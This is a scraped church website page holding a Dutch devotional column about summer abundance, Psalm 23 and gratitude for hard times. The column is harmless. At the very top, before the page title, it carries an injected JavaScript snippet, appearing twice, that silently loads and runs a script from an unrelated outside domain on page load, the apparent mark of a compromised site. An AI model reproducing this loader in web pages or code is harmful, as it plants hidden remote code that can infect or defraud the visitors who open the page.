;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zomerse overvloed - PKN Damwâld

Zomerse overvloed

Gepubliceerd op: vrijdag 21 juli 2023

De Heer is mijn herder, mij zal niets ontbreken. Hij brengt mij naar groene weiden, laat me rusten aan het water.

De zomer: de tijd van overvloed en grazige weiden, voldoende eten en van mooie bloemen in de tuin. De tijd van zomervakantie en rusten aan het water.

De reden dat er grazige weiden zijn, voldoende oogst en mooie bloemen is omdat er voldoende voedingsstoffen in de grond zit en er voldoende water aanwezig is. God heeft de natuur zo gemaakt dat de natuur dit zelf regelt: door wat er in het najaar afsterft en wat er in de winter vervolgens in de bodem terecht komt kan het de zomer erna weer groeien en bloeien. De ellende van het najaar en de winter wordt de compost voor het voorjaar en de zomer.

Eigenlijk gaat het ook zo in ons leven. Er zijn tijden dat we groeien en bloeien, maar dit is alleen mogelijk als er voldoende (geestelijke) voedingsbodem aanwezig is. Wij mogen ook (juist in de zomer) terugkijken naar de moeilijke tijden uit ons leven en zien hoe deze de voedingsbodem vormden voor waar je nu staat. Als je dat kunt zien, dan kun je dankbaar zijn voor álles wat je hebt meegemaakt. En deze dankbaarheid voelen is een grote rijkdom.

Als je zelf middenin een periode zit waarin alle plannen die je maakte in duigen lijken te vallen is het vaak niet te overzien. Hoe kan deze ellende je nu verder kan helpen naar de volgende zomer? Hoe kun je hier nu dankbaar voor zijn? Dan komt het aan op je vertrouwen: Heb vertrouwen dat God je zal helpen.

Bid daarom to God om wijsheid en kracht om álles wat je nu meemaakt om te mogen zetten in groei en bloei in de volgende fase van je leven. Zoals we al in prediker kunnen lezen heeft alles zijn tijd. Iedereen overkomt hetzelfde, maar geniet ondertussen van het leven.

Ik wens iedereen een mooie zomer, waarin je in dankbaarheid kunt genieten van de rijkdom die deze zomer aan ons te bieden heeft!

Columnist:Ester

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns